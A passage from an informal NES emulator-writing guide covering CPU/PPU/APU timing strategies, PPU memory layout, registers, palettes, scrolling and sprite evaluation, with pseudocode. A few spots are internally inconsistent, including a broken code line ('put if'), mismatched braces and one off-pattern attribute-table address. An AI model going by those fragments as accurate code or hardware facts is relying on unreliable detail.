NMI, or the APU raising an IRQ, they are deterministic and also relies on the CPU. So one can write a function that predicts when NMI or IRQ fires, and act accordingly, and their behavior is changed due to a memory read/write, so the CPU can also keep track of that by having the code in memory read/write to re-predict such changes. For APU, we use CPU cycles because the APU run at the same pace as the CPU. ===========Example======================================================== void run_nes() { while (run) { predict_nmi(); //add to queue when it triggers predict_irqs(); //add to queue when it triggers run_cpu(CPU_PPU_SCANLINE); //use ppu cycle resolution ppu_run(PPU_PPU_SCANLINE); apu_run(CPU_PPU_SCANLINE); } } void mem_write(int addr, u8 data) { switch (addr) { case reg_that_affects_nmi: repredict_nmi(); //reconfigure the queue break; case reg_that_affects_irq: repredict_irq();//reconfigure the queue break; } } //do the same for mem_read We can do this because at the beginning, the NMI and IRQs are predicted from the start, and the only way to change their times is through controlled read or writes, allowing this method to be reasonably accurate and pretty fast. ========================================================================== ========================================================================== The second method is one of the most accurate form of timing one can make for the NES. It is known as the "Cycle Based" method. ===================Example================================================ u8 rd(int addr) { //handle whatever else that could affect memory or could take more //cycles here. cpu._nmi = cpu.nmi; cpu._irq = cpu.irq && !cpu.fi; ppu_run(); apu_run(); mapper_run(); return mem_read(addr); } void wr(int addr, u8 data) { cpu._nmi = cpu.nmi; cpu._irq = cpu.irq && !cpu.fi; ppu_run(); apu_run(); mapper_run(); mem_write(addr, data); } /* doesn't really matter what order, except that mem_read and mem_write happens at the end because the CPU can change the behavior of the PPU and APU, but since in a real NES, the units runs concurrently, the change would happen on the next cycle usually. */ void cpu_run() { cpu.opcode = rd(cpu.pc++); switch (cpu.opcode) { case opcode: //do stuff break; } if (cpu._nmi) enter_nmi(); else if (cpu._irq) enter_irq(); } void nes_run() { while (run) { cpu_run(); } } With this version, instead of running the ppu/apu/mapper hardware once every X cycles, we run those every memory access, which is every cycle. This form of timing is called "Per Cycle" and it is the most accurate method of all, since no cycle is missed, and everything runs in sync. The _nmi and _irq temporary variables are introduced because NMI and IRQ is set by the PPU and the APU, but it does not take effect until *ONE* cycle later, which sometimes can cause IRQ/NMI to run one opcode later, as we can see that the CPU continuously recieves one opcode at a time and then handle the NMI/IRQ at the end. Just a glance shows how much more accurate this version is than the first version, since it can handle small changes to cycle accuracy. The major downside to this method is the major speed hit the program takes using this method. This is a good method for newcomers to use because of the relative ease one can handle NMIs or IRQs, or PPU scrolling writes, because it runs on every cycle, allowing you to check for such cases with a simple conditional branch. This method also helps you with how the NES work per cycle, allowing you to understand what goes on behind the NES every cycle, so I recommend writing an emulator with this method first, so you can understand the NES so much better, before going into faster methods that require more understanding of the NES. Note that this method, you run one opcode worth of time whenever you call cpu_run(). There are no cycle parameter in cpu_run() as we can see. ========================================================================== A third way that is becoming a popular method of timing is the "Catch-up" method. With this method, the idea is to keep running CPU running for a whole frame, and then whenever a memory mapped register gets written to that affect the behavior of the PPU or the APU, you run the PPU/APU to "catch up" with the CPU. Thanks to Disch for writing about this method going to be incroporated in here. The idea is to keep a CPU timestamp and a PPU timestamp, and for every CPU cycle that is execute, increment the CPU timestamp by 15 for NTSC, 16 for PAL, and 5 for the PPU timestamp, and then the cpu_run() function will accept an runto parameter that is ran to that amount of time, usually a whole frame worth of time, and during the run, if any code that affects the PPU or APU, it is ran to catch up to the CPU to that point, and then the change takes place. ===================Example=============================================== void run_nes() { while (run) { cpu_run(WHOLE_FRAME); ppu_run(cycles_needed_to_sync_with_cpu); apu_run(cycles_needed_to_sync_with_cpu); } } void mem_write(int addr, u8 data) { switch (addr) { case reg_that_affects_ppu: ppu_run(cycles_needed_to_sync_with_cpu); //make write break; case reg_that_affects_apu: ppu_run(cycles_needed_to_sync_with_cpu); //make write break; } } //same goes for the mem_read With this method, we save much function calls, and alot of timing checks by just having the PPU or APU catch up with the CPU whenever it needs the behavior changing. This method works well for games that doesn't change the behavior of the PPU/APU often, and for those that does, the speed won't be that bad either. As you can see with the implementation, you need to be able to exit and re-enter the PPU/APU at an arbitary time, so variables such as what scanline it is on or what apu cycle it is needed. ========================================================================== -------------------------------------------------------------------------- IV. PPU (Picture Processing Unit) The PPU is the unit of the NES that renders graphics. It is a separate unit from the CPU and has its own registers and memory maps. The PPU native resolution is 256x240, though NTSC TV doesn't display the top and bottom 8 pixels. It draws the graphics using the name tables, the pattern tables, the attribute tables, and the palettes, which will be explained how later. +++++++++PPU Memory Map+++++++++++++++++++++++++++++++++++++++++++++++++++ The PPU is big endian (it stores the graphics in MSB, and the "program counter" address of it is MSB.) Here is the memory map of the PPU, in bytes. The Sprite Table [0, 0xFF]: This is a separate memory map from memory locations below, meaning it does not lie in the pattern tables listed below. This is the data where the sprite information are stored, such as the position of it, wheter or not it is to be drawn, etc. Each sprite information is 4 bytes each, so the NES can store up to 64 sprites (256/4). You can write to this table by using OAMDATA using the OAMADDR as the index. Here is what each byte does: ==========Sprite Data===================================================== Byte 0 Y position of top of sprite. The sprite data is delayed by one scanline due to the way the sprite is fetched, which is covered later. So for game programmers, you must subtract 1 from the sprite's Y coordinate before writing it here. Hide a sprite by writing any values in 0xEF to 0xFF here, because the NES width is only 240, and since 0xEF is 239 (the NES uses scanline numbering form of 0 to 239), taking in account of the delayed by 1 scanline , thus, it doesn't get drawn. 0xEF gets detected however, and the normal sprite fetches are applied to that scanline, but it just doesn't get drawn. Byte 1 Tile index number For 8x8 sprites, the tile number of this sprite. For 8x16 sprites: 76543210 |||||||| |||||||+- Bank (0x0000 or 0x1000 address line used for tile fetching) +++++++-- Tile number of top of sprite (0 to 254; bottom half gets the next tile) Byte 2 Attributes 76543210 |||||||| ||||||++- Palette (4 to 7) of sprite |||+++--- Unimplemented, reads back as 0 ||+------ Priority (0: in front of background; 1: behind background) |+------- Flip sprite horizontally +-------- Flip sprite vertically Byte 3 X position of left side of sprite X-scroll values of F9-FF do NOT result in the sprite wrapping around to the left side of the screen, it doesn't get shown. Most programs write to a copy of OAM somewhere in CPU addressable RAM (often 0x0200-0x02FF) and then copy it to OAM each frame using the OAM_DMA (0x4014) register. ========================================================================== The Sprite Buffer [0, 0x20]: This is a 32 bytes buffer that is used to store the data of the sprite during rendering, the PPU reads from here to figure out which sprite to draw. Due to it being 32 bytes, it can hold up to 8 sprites a scanline, (32/4) = 8. For programmers of the NES, there is no way to access this buffer by regular means, the only way is to read 0x2004 during the PPU rendering for the sprite data in here to be exposed. The Pattern Tables [0, 0x1FFF]: The pattern table stores the 2 lower bits of nibble that is used to index the palette for what color to draw on the screen. This is what the CHR-ROM in the game cartridge (if it has any) is. If the game has CHR-ROM inside, it is loaded to this memory space, trying to write data to it if it has CHR-ROM will not change the contents of the registers, since it is "ROM", however, if the game is CHR-RAM based, then it is allowed to change the contents of the registers on a write. CHR-RAM is basically using PRG-ROM code space to hold the graphics, and copying them to the address to draw. To figure out if the game is using CHR-RAM, check to see if the CHR-ROM is 0 inside the header, although some games can use both, for that, check the mapper number/board name of the game file. The 2 lower bits are accessed by writing to the name table which tile you want to use. The 2 lower bits are obtained from 2 separate bytes, which the 2 bits are 8 bytes apart, because a tile is 8x8 pixels, so 8 bit in 8 bytes has the same resolution. For example, let say the tile we want is start at the pattern_table[0], the first pixel. Since the PPU is MSB, the first bit is (pattern_table[0] & 0x80) and the second bit is (pattern_table[7] & 0x80), so the lower 2 bits to the index that accesses the palette to produce a color onto the screen is pixel_index = ((pattern_table[0] & 0x80) >> 7) | ((pattern_table[7] & 0x80) >> 6)); The lower 2 bits also determines wheter the pixel is transparent, that is it uses the master color (0 index) of the palette or not. If the 2 bits are 0 then it is transparent, that is, if the 2 bits are 0, then the attribute table which is the upper 2 bits, are not used. The Name Tables [0x2000, 0x23BF] [0x2400, 0x27BF] [0x2800, 0x2BBF] [0x2C00, 0x2FBF]: The NES has 4 name tables, arranged in a 2x2 block pattern, each 0x400 bytes each. Here is a visual representation of it. (0,0) (256,0) (511,0) +-----------+-----------+ | | | | | | | 0x2000 | 0x2400 | | | | | | | (0,240)+------------+-----------+(511,240) | | | | | | | 0x2800 | 0x2C00 | | | | | | | +------------+-----------+ (0,479) (256,479) (511,479) The 2 dimensional coordinates of it is the corresponding pixels on the screen, that is, if it draws in linear order. Each name table does not have its own memory space, without some extra mapper hardware from the game cartridge, instead it has a couple of ways of mirroring. Here is the form of mirroring the NES can use: Horizontal Mirroring: [0x2000, 0x23FF] mirrors [0x2400, 27FF] [0x2800, 0x2BFF] mirrors [0x2C00, 0x2FFF] Vertical Mirroring: [0x2000, 0x23FF] mirrors [0x2800, 0x2BFF] [0x2400, 0x27FF] mirrors [0x2C00, 0x2FFF] One Screen Mirroring: All address points to the same data. Enabled by a mapper usually. 4 screen Mirroring: Each addresses have their own memory space. Enable by a mapper usually. One byte of the name table holds the address of one tile (8x8 pixel), making up 32x30 (0x3C0 bytes) rows of data. (32*8) = 256 and (30*8)=240, thus making one name table the resolution of the PPU. The Attribute Table [0x23C0, 0x23FF] [0x27C0, 0x27FF] [0x28C0, 0x28FF] [0x2FC0, 0x2FFF]: The attributes table are the upper 2 bits to the nibble of the byte that will be the index to the color palette used to draw to the screen. It is the 64 bytes at the end of the nametable, The location of the data in the name table will determine which 2 bits in this 64 byte table will be used. It has 4 extra bytes that isn't used for anything, since there are 960 tiles and one byte corresponds to 4x4 (32*32 pixels) tiles, (960/(4*4) = 60 bytes), shows that the the last 4 bytes are indeed not used. Each byte in the attribute table stores 32x32 upper 2 bits, which is shared across 2 tiles each. Visual representation of a byte in the attribute table. 2 bits inside the attribute table is shared by 2 tiles, making up 4 grouping of 8x8 pixels, making one attribute byte controlling 32x32 block pixels. +---+---+---+---+ | | | | | + D1-D0 + D3-D2 + | | | | | +---+---+---+---+ | | | | | + D5-D4 + D7-D6 + | | | | | +---+---+---+---+ An example, name_table[0, 3] is used in byte 0 of the attribute table, and the next name_table[4, 7] will use byte 1 of the attribute table, and then so on until it does this 8 times, then it loops back so name_table[32, 35] will use byte 0 of the attribute table again, as the pictoral version show, it goes horizontal all 8 times, each with 4 tiles in the horizontal of a byte, covering 256 pixels (the horizontal resolution of the NES) before it goes back to 0. Mirror of the Name Table: [0x3000, 0x3EFF] These are mirror of the name table and attribute table, that is, if the address is in this range, what will be accessed is data[address - 0x1000]; The Palette: [0x3F00, 0x3FFF] The palette is the color index that is used to determine what color will display at a pixel, it is not RGB based, but instead, based on Hue/Saturation/Value, which is the byte in the palette corresponds to 76543210 |||||||| ||||++++- Hue, ||++----- Value, attribute table ++------- Unimplemented, reads back as 0 while the index to access the palette byte can be viewed as 43210 ||||| |||++- Pixel value from tile data |++--- Palette number from attribute table or OAM +----- Background/Sprite select Here is the table for the palette, that tells what each byte does: 0x3F00 Universal background color 0x3F01-0x3F03 Background palette 0 0x3F05-0x3F07 Background palette 1 0x3F09-0x3F0B Background palette 2 0x3F0D-0x3F0F Background palette 3 0x3F11-0x3F13 Sprite palette 0 0x3F15-0x3F17 Sprite palette 1 0x3F19-0x3F1B Sprite palette 2 0x3F1D-0x3F1F Sprite palette 3 Addresses $3F04/$3F08/$3F0C can contain unique data, though these values are not used by the PPU when rendering. Addresses $3F10/$3F14/$3F18/$3F1C are mirrors of $3F00/$3F04/$3F08/$3F0C. The palette will be filled with whatever values that represent color in your graphic API. The palette is is 64 byte in size * (2^3) from the color emphasis bits, making it 512 bytes in total. Here are the colors that is makes up the table. The color table used in the NES is not RGB, instead the NES uses hue/luminance to represent the color, and TV displays different color depending on the settings. So here are the guidelines for the color table. (It goes from darker color at the bottom to lighter at the top. 0x00, 0x10, 0x20, 0x30 = dark gray to white. 0x01, 0x11, 0x21, 0x31 = dark blue (purpleish) to light blue. 0x02, 0x12, 0x22, 0x32 = dark blue but lighter than 1 goes on to light blue. 0x03, 0x13, 0x23, 0x33 = dark purple/pinkish to lighter purple/pinkish 0x04, 0x14, 0x24, 0x34 = dark pink to lighter pink 0x05, 0x15, 0x25, 0x35 = dark red/orange to lighter red/orange. 0x06, 0x16, 0x26, 0x36 = dark orange to lighter orange. 0x07, 0x17, 0x27, 0x37 = dark brownish to lighter brown. 0x08, 0x18, 0x28, 0x38 = dark brown to lighter brown. 0x09, 0x19, 0x29, 0x39 = dark green to lighter green. 0x0A, 0x1A, 0x2A, 0x3A = greenish to lighter green. 0x0B, 0x1B, 0x2B, 0x3B = dark green to lighter green 0x0C, 0x1C, 0x2C, 0x3C = dark bluish to lighter cyan 0x0D, 0x1D, 0x2D, 0x3D, 0x0E, 0x1E, 0x2E, 0x3E, 0x0F, 0x1F 0x2F, 0x3F are all black. As for the other 448 bytes, they are in ratio with each other of the base, thanks to quietust for measuring the values. I am not sure what the ratio for the PAL is, but most emulator set the same emphasis factor for both of them, so I think this can be used for PAL, don't take my word on it. The palette color values is really up to you as long as it follows the colors above. static const float ntsc_emphasis_factor[7][3] { {1.00, 0.80, 0.81}, {0.78, 0.94, 0.66}, {0.79, 0.77, 0.63}, {0.82, 0.83, 1.12}, {0.81, 0.71, 0.87}, {0.68, 0.79, 0.79}, {0.70, 0.70, 0.70} }; [0x4000, 0xFFFF] These addresses are mirrors of the the of the memory space [0, 0x3FFF], that is, any address that falls in here, it is accessed by data[addr & 0x3FFF]. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++PPU Registers++++++++++++++++++++++++++++++++++++++++++++++++++++++ Here are the PPU memory mapped registers, they are 8 bit in size except for a register (0x2006 which is 15 bits wide), they are accessed in the CPU memory map. PPUCTRL (0x2000): This is a a write only register, reading it will return open bus. Here is the list of what each bit in the write do. 76543210 |||||||| ||||||++- Base nametable address |||||| (0 = $2000; 1 = $2400; 2 = $2800; 3 = $2C00) |||||+--- VRAM address increment per CPU read/write of PPUDATA ||||| (0: increment by 1, going across; 1: increment by 32, going down) ||||+---- Sprite pattern table address for 8x8 sprites (0: $0000; 1: $1000) |||+----- Background pattern table address (0: $0000; 1: $1000) ||+------ Sprite size (0: 8x8; 1: 8x16) |+------- PPU master/slave select (has no effect on the NES) +-------- Generate an NMI at the start of the vertical blanking interval (0: off; 1: on) The select bits such as the base name table address and sprite pattern table will be explained in a later section. Writing here can trigger multiple NMIs explained later. PPUMASK (0x2001): This is a write only regiser, reading it will return open bus. This register controls some operations of the PPU when it writes to the screen. 76543210 |||||||| |||||||+- Grayscale (0: normal color; 1: AND all palette entries ||||||| with 0x30, effectively producing a monochrome display; ||||||| note that colour emphasis STILL works when this is on!) ||||||+-- Enable background in leftmost 8 pixels of screen (0: no; 1:yes) |||||+--- Enable sprite in leftmost 8 pixels of screen (0: no; 1: yes) ||||+---- Enable background rendering |||+----- Enable sprite rendering ||+------ Intensify reds (and darken other colors) |+------- Intensify greens (and darken other colors) +-------- Intensify blues (and darken other colors) PPUSTATUS (0x2002): This register returns the status of the PPU. This is read-only. Writing to it does nothing. 76543210 |||||||| |||+++++- Unimplemented (read back as open bus data) ||+------ Sprite overflow. The PPU can handle only eight sprites on one || scanline and sets this bit if it starts dropping sprites. || Normally, this triggers when there are 9 sprites on a scanline, || but the actual behavior is significantly more complicated. |+------- Sprite 0 Hit. Set when a nonzero pixel of sprite 0 'hits' | a nonzero background pixel. Used for raster timing. +-------- Vertical blank has started (0: not in VBLANK; 1: in VBLANK) Reading here in vblank at a certain time can turn off NMI for the frame, that will be explained later. OAMADDR (0x2003): The address of where OAMDATA will use, it is also the starting address that SPRDMA will use to to write data to the sprite address. it is write only, reading will return open bus. Writing here during the PPU rendering might mess up the sprite rendering, though the exact behavior isn't figured out yet. OAMDATA (0x2004): This the the register used to communicate with the sprite data, it returns whatever is in the OAMADDR is set to when the PPU is not rendering graphics, if it is, then it returns what the PPU is reading from the sprite data to render onto the screen. The OAMADDR is auto incremented on writes to this. Attribute regs bit 5 to 8 are unimplemented, read back 0 here, so data &= 0xE3. Reading here increments the OAMADDR, when it is over 0xFF mark, it wraps back to 0. Writing here does *not* increment the OAMADDR however. PPUSCROLL (0x2005): This affects where the PPU will read from the name table. It modifies the horizontal and vertical offset of the name table read, a detailed explanation of it will be given in a later section. Example code that sets it: lda cam_position_x sta PPUSCROLL lda cam_position_y sta PPUSCROLL PPUADDR (0x2006): This is the register where you write the address that you want to read from or write to using PPUDATA (0x2007). Games must not ever write to this address during rendering, or it will mess up the display, this will be explained in a later section. Reading here will return open bus. During rendering the address written here will be the "program counter" for the PPU, so this is why it messes up, because the PPU also increments that register as its rendering leading to addresses you don't want. Only use this during vblank to update graphic data. PPUDATA (0x2007): This address is used to write or read data from the specified address in PPUADDR (0x2006). Do not read from or write to this address during rendering, it will mess up the display. If you do read from it it returns the internal operation of the PPU, and if you write to it, it writes to address the PPU currently is using to get data to draw to the screen. The reason it messes it up is because it increments the "program counter" of the PPU which causes distortions to the rendering. I believe the rationale for incrementing the program counter automatically on a read or write is to help the programmer save precious VBLANK time from manually incrementing it themselves. Since the only time you can write to the graphics or read from it is VBLANK or when the PPU is turned "off". Reads are delayed by one cycle, discard the first byte read, in example, here is how one reads 0x2007: tmp = cpu.reg2007; cpu.reg2007 = data; return tmp; However, if the address is in the palette range, that is (0x3F00 to 0x3FFF) accesses the address, without the delayed read. On writes to the 0x2007 register, if the game uses CHR-ROM, writing to memory address [0, 0x1FFF] should do nothing, while it works normally for CHR-RAM. PPUADDR is incremented with the value set in PPUCTRL after every read or write to 0x2007. There is one last quirk, and that is if the register 0x2006 address is in the palette range, that is if the range is ((ppu.reg[6] & 0x3F00) == 0x3F00) what is returned is the palette data, but what is copied to the delayed buffer is addr[ppu.reg[6] - 0x1000]; SPRDMA (0x4014): You write the starting address of where you want to write the data to the SPR data. The address written is shifted by 8 (xx00) since it copies 256 bytes starting with 0 to fill up the sprite memory space. This operations takes 513 cycles, 1 cycle for read, 1 cycle for write, (256 * 2) = 512, and 1 last read cycle. Here is the code for to show it more clearly: static void wr_spr_dma(u8 data) { // tmp = data * 0x100 int i, k, tmp = data << 8; for (i = 0; i != 0x100; ++i) { //513 cycles 1 for read //1 write, final is read k = rd(tmp | i); rd(tmp | i); ppu.spr_data[(nes.ppu.reg[3] + i) & 0xFF] = k; } rd(cpu.pc); //as you can see, this operation halts the CPU, //the APU/PPU is still running but the CPU needs to wait //until this is finished. } Note about open bus: The PPU open bus doesn't work like the CPU open bus, here is how it works, as explained by dvdmth. Unimplemented bits in the regs get the value of what was last written since writing to the PPU address lines [0x2000, 0x3FFF]. The data just wrote gets placed on a latched register so reading an unimplemented address line, gets the latched register just written to a r/w port. Here is a full example of how open bus relates. u8 read_ppu_reg(int addr) { switch (addr & 7) { //reg 0x2000, 0x2001, 0x2003, 0x2005, 0x2006 //are unimplemented as read, so it returns open bus case 0: case 1: case 3: case 5: case 6: return ppu.open_bus; break; case 2: tmp = ppu.reg[2]; tmp |= (ppu.open_bus & 0x1F); //because reg 0x2002 lower 5 bits are unimplemented //reading 0x2002 will cause it to //put bit 5-7 onto the latch, since the lower is unimplemented //no writing to that buffer. ppu.open_bus &= 0x1F; ppu.open_bus |= (ppu.reg[2] & 0xE0); return tmp; break; case 4: ppu.open_bus = ppu.spr_data[ppu.reg[3]]; return stuff; break; case 7: ppu.reg[7] = data; //set the data first ppu.open_bus = ppu.reg[7]; return stuff; } } void write_ppu_reg(int addr, u8 data) { switch (addr & 7) { case 0: case 1: case 3: case 5: case 4: case 6: case 7: ppu.open_bus = data; } } ========================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++The Gritty Details of the PPU++++++++++++++++++++++++++++++++++++ We will use the convention of the scanline starting from -1 and up to the end scanline. We have 20 scanline of vblank time for NTSC, and 70 scanline for PAL. The height is 240, and then there are 1 scanline used to obtain the data for pre drawing, and 1 scanline does nothing but run (No rendering or anything). Summing up, we have 262 scanlines for the the NTSC NES, and 312 scanlines for the PAL. To figure out the refresh rate, we do a little math using the formula CPU_FREQ/(NUM_SCANLINES*CPU_FREQ_PER_SCANLINE), and plugging in for NTSC 1789772/(262*(113+2/3)), we get ~60 Hz for the NTSC PPU and 1662607/(312*(106+9/16)) for PAL, giving us ~50 Hz. As we know the, the NTSC PPU runs 3 times the speed of the CPU, and 3.2 for PAL, Thus, there are 341 PPU cycles in the PPU (113+2/3)*3 = 341, and (106+9/16)*3.2 = 341. The NTSC PPU has a quirk however, that on every first scanline, it is one cycle shorter, so the first scanline is 340 cycles instead of 341 on every odd frame that is rendering. If the PPU rendering is off, (background and sprite is disabled) through reg 0x2001, then it is the normal 341 cycles for all PPU scanlines. Blargg recently did some testing on the NES NTSC PPU and found these new information stated here. ===================Blargg's Info=========================================== The PPU has an even/odd flag that is toggled every frame, regardless of whether the BG is enabled or disabled. With BG disabled, each PPU frame is 341*262=89342 PPU clocks long. There is no skipped clock every other frame. With BG enabled, each odd PPU frame is one PPU clock shorter than normal. I've (blargg) timed this to occur around PPU clock 328 on scanline 20, (20 in this case is -1 in this document) but haven't written a test ROM for it yet. By keeping BG disabled until after the time when the clock is skipped on odd frames, you can get a different color dot crawl pattern than normal (it looks more like that of interlace, where colors flicker between two states rather than the normal three). Presumably Battletoads (and others) encounter this, since it keeps the BG disabled until well after this time each frame. On startup, the CPU/PPU falls into one of the alignment with each other, the emulator doesn't need to worry about this however, since we can choose whatever alignment we want, generally exact with the CPU. * The NTSC PPU runs at 3 times the CPU clock, so for a given power-up PPU events can occur on one of three relative alignments with the CPU clock they fall within. The PPU uses a different master clock divider, so there are more than just three alignments possible before powering up. The results below only cover one particular set of alignments (the one with the fewest special cases). * Synchronizing with the PPU clock: If BG rendering is off, each frame will be 29830.6667 CPU clocks long. If the CPU checks the VBL flag in a loop every 29831 clocks until it is set, at some point it will end when the VBL flag is set just before the CPU reads it: PPU 29830.7 29830.7 29830.7 29830.7 -C--P-------C--P-------C-P-------CP-------* CPU 29831 29831 29831 29831 * The above synchronization will result in an exact PPU/CPU alignment. -|--.--V--|- -|--V--.--|- -V--.--.--|- Read Read Read Loop will stop here ========================================================================== ========================Sprite Priority=================================== Here is how the sprite priority works, as documented in nesdevwiki What really happens in the NES PPU is conceptually more like this: 1. During sprite evaluation for each scanline (cycles 256 to 319), the eight frontmost sprites on this line get drawn front (lower index) to back (higher index) into a buffer, taking only the first opaque pixel that matches each X coordinate. Priority does not affect ordering in this buffer but is saved with each pixel. 2. The background gets drawn to a separate buffer. 3. For each pixel in the background buffer, the corresponding sprite pixel replaces it only if the sprite pixel is opaque and front priority. (Low-level hardware detail: The buffers don't actually exist as full-scanline buffers inside the PPU but instead as a set of counters and shift registers. The above logic is implemented a pixel at a time.) ========================================================================== Now the PPU draws 1 pixel every cycle, and it does it for 256 cycles, for 256 horizontal pixels, while it does that, it also fetches new data to draw along with decoding the sprite. Knowing that the PPU draws 1 pixel a cycle, we can use this to justify the first dummy scanline, that is, the scanline that is not on screen, but still rendering the data. The first dummy scanline acts like the other scanlines, getting the data the same way, but it is not displayed, the whole purpose of it is to get the 2 tiles at the end, which is used for drawing the 16 pixels in the next scanline, giving the PPU some leeway for it to fetch the other tile datas to draw. Why 2 tiles, and not just 1? The reason for this has to do with a [0, 7] value called inc_x which when the PPU draws, it renders as pixel_data[cycle+inc_x]. Fine X is set by writing to register 0x2005, which is covered later. Then the PPU starts rendering 240 scanlines for to cover 256x240 resolution of the NES. There is one extra scanline that doesn't seem to do anything except run, no rendering, nor any change to the PPU data. At the end of the scanline, VBLANK begins, allowing the game programmer to be able to write to the PPU without messing up the display or data, since in VBLANK, the PPU does nothing (no rendering or memory fetches), then the process starts all over again. The NES has 2 layers of graphics, the background layer and the sprite layer, more will be shown on how they interact in the PPU per-cycle explanation. Before moving on to what the PPU does every cycle, we will show first what writing 0x2000 address or 2005/2006 does to the scrolling. Thanks to loopy for figuring this out. Documents generally refer this as loop_v and loopy_t. ======Registers that effect scrolling===================================== void reg_2000_wr() { /* 2000 write: t:xxxxABxxxxxxxxxx=d:xxxxxxAB t is treg6 in this case */ ppu.treg6 &= 0x73FF; ppu.treg6 |= ((data & 0x03) << 10); } void reg_2005_wr() { //0x2005 is latched, //so it takes 2 writes to fully //write the data, on startup //ppu.scroll_latch is set. /* from loopy's docs t is treg6 while x is the fine x how it's used and what it represents is shown later 2005 first write: t:xxxxxxxxxxxABCDE=d:ABCDExxx x=d:xxxxxABC 2005 second write: t:xxxxxxABCDExxxxx=d:ABCDExxx t:xABCxxxxxxxxxxxx=d:xxxxxABC */ //corresponding code if (ppu.scroll_latch) { ppu.treg6 &= 0x7FE0; ppu.treg6 |= ((data & 0xF8) >> 3); ppu.inc_x = data & 0x07; } else { ppu.treg6 &= 0xC1F; ppu.treg6 |= (((data & 0xF8) << 2) | ((data & 0x07) << 12)); } ppu.scroll_latch ^= 1; } void reg_2006_wr() { /* from loopy's docs t is treg6 while v is reg[6] how it's used and what it represents is shown later */ /* 2006 first write: t:xxABCDEFxxxxxxxx=d:xxABCDEF t:ABxxxxxxxxxxxxxx=0 (bits 14,15 cleared) 2006 second write: t:xxxxxxxxABCDEFGH=d:ABCDEFGH v=t */ if (ppu.scroll_latch) //0x2005 and 0x2006 share the same latch { ppu.treg6 &= 0xFF; ppu.treg6 |= ((data & 0x3F) << 8); } else { ppu.treg6 &= 0x7F00; ppu.treg6 |= data; ppu.reg[6] = ppu.treg6; } ppu.scroll_latch ^= 1; } ========================================================================== ===========PPU cycle granularity code===================================== Now, we move on to the code that shows what the PPU does along with an explanation in the comments, the code is not optimized and is cycled based, giving a clear explanation of what it does. The code was based on nintendulator source code, since it provides a very detailed going ons of the PPU. Thanks! /* Notation: scanline [-1] = the scanline that reads the data for the next scanline but doesn't render scanline [0, 239] = scanlines that get drawn to the screen scanline [240] = the idle scanline. scanline [241, end_scanline] = end_scanline being 261 for NTSC or 311 for PAL, this is VBLANK time pixel_buf is 256*240 bytes of data for the screen resolution palette_index_buf is the 272 bytes index buffer used to store the index to access the palette color. PPU cycles go from 0 to 340 for 341 cycles. The sprite ppu.sspr_data[] is the 32 bytes array that hold sprite information that the PPU will use to draw. ppu.rendering is determined by 0x2001 (background or sprite rendering on) and it is less than scanline 240. All the other should be self explanatory. */ void sprite_run() { //this gets ran when the PPU is running, thanks to kevtris //and quietust for figuring this out, one game needed //accurate sprite rendering since it reads from 0x2004 //during rendering. (Micro Machines) //spr_state is set to whatever the memory the PPU //is accessing, we return spr_state in 0x2004 when the PPU //is rendering to achieve accurate readings. /* no code will be given here, as I do not think the code will explain better than this document. Documented by kevtris and quietust, thanks! */ During all visible scanlines, the PPU scans through OAM to determine which sprites to render on the next scanline. During each pixel clock (341 total per scanline), the PPU accesses OAM in the following pattern: 1. Cycles 0-63: Secondary OAM (32-byte buffer for current sprites on scanline) is initialized to $FF - attempting to read $2004 will return $FF 2. Cycles 64-255: Sprite evaluation * On even cycles, data is read from (primary) OAM * On odd cycles, data is written to secondary OAM (unless writes are inhibited, in which case it will read the value in secondary OAM instead) * 1. Starting at n = 0, read a sprite's Y-coordinate (OAM[n][0], copying it to the next open slot in secondary OAM (unless 8 sprites have been found, in which case the write is ignored). * 1a. If Y-coordinate is in range, copy remaining bytes of sprite data (OAM[n][1] thru OAM[n][3]) into secondary OAM. * 2. Increment n * 2a. If n has overflowed back to zero (all 64 sprites evaluated) go to 4 * 2b. If less than 8 sprites have been found, go to 1 * 2c. If exactly 8 sprites have been found, disable writes to secondary OAM * 3. Starting at m = 0, evaluate OAM[n][m] as a Y-coordinate. * 3a. If the value is in range, set the sprite overflow flag in $2002 and read the next 3 entries of OAM (incrementing 'm' after each byte and incrementing 'n' when 'm' overflows); if m = 3, increment n * 3b. If the value is not in range, increment n AND m (without carry). If n overflows to 0, go to 4; otherwise go to 3 * 4. Attempt (and fail) to copy OAM[n][0] into the next free slot in secondary OAM, and increment n (repeat until HBLANK is reached) 3. Cycles 256-319: Sprite fetches (8 sprites total, 8 cycles per sprite) * 1-4: Read the Y-coordinate, tile number, attributes, and X-coordinate of the selected sprite * 5-8: Read the X-coordinate of the selected sprite 4 times. * On the first empty sprite slot, read the Y-coordinate of sprite #63 followed by $FF for the remaining 7 cycles * On all subsequent empty sprite slots, read $FF for all 8 reads 4. Cycles 320-340: Background render pipeline initialization * Read the first byte in secondary OAM (the Y-coordinate of the first sprite found, sprite #63 if no sprites were found) This pattern was determined by doing carefully timed reads from $2004 using various sets of sprites. In the case where there are 8 sprites on a scanline, the sprite evaluation logic effectively breaks and starts evaluating the tile number/attributes/X-coordinates of other sprites as Y-coordinates, resulting in rather inconsistent sprite overflow behavior (showing both false positives and false negatives). From the document, this is the sprite unit and what it reads back, as for rendering, the sprite rendering begins after the background rendering, that is at cycle 256, as we can see the sprite unit needs up to cycle 255 to be finished with getting everything. The rendering is just like the background with the tile fetching pattern address and such. A quirk note about the sprite data and how it is gotten, the first *TWO* sprite in the 256 byte buffer, index starts at (reg2003 & 0xF8), instead of the normal 0 and 4, though if reg2003 is 0, then it does start at 0 and 4. After the 2 first sprite that is the index of sprite 0 and sprite 1 is processed, not in the y range or in, the sprite is processed back to linear order, that is sprite 2 and 3 and so on is from 8, 12, etc. If the address is gone over 0xFF, then it wraps back to 0. } void ppu_run(int ppu_cycles) { for (int i = 0; i != ppu_cycles; ++i) { ++ppu.cycle; if (ppu.cycle == 256) put if (ppu.scanline > -1 ) ppu.end_cycle = 341; else if (ppu.short_scanline && ppu.rendering) ppu.end_cycle = 340; //while blargg's document said it was around 328, //we just need to keep the sum of the cycles the same. } else if (ppu.cycle == 304) { //frame start, $2006 gets reloaded with the tmp addr //this happens in the dummy scanline, and the PPU //is rendering. The reason for the reload because //reg[6] is changed as the PPU is rendering. //reg[6] is the "program counter" for the PPU. if ((ppu.scanline < 0) && ppu.rendering) ppu.reg[6] = ppu.treg6; } else if (ppu.cycle == ppu.end_cycle) { ++ppu.scanline; ppu.cycle = 0; if (ppu.scanline == 0) ppu.on_screen = 1; else if (ppu.scanline == 240) //the idle scanline, 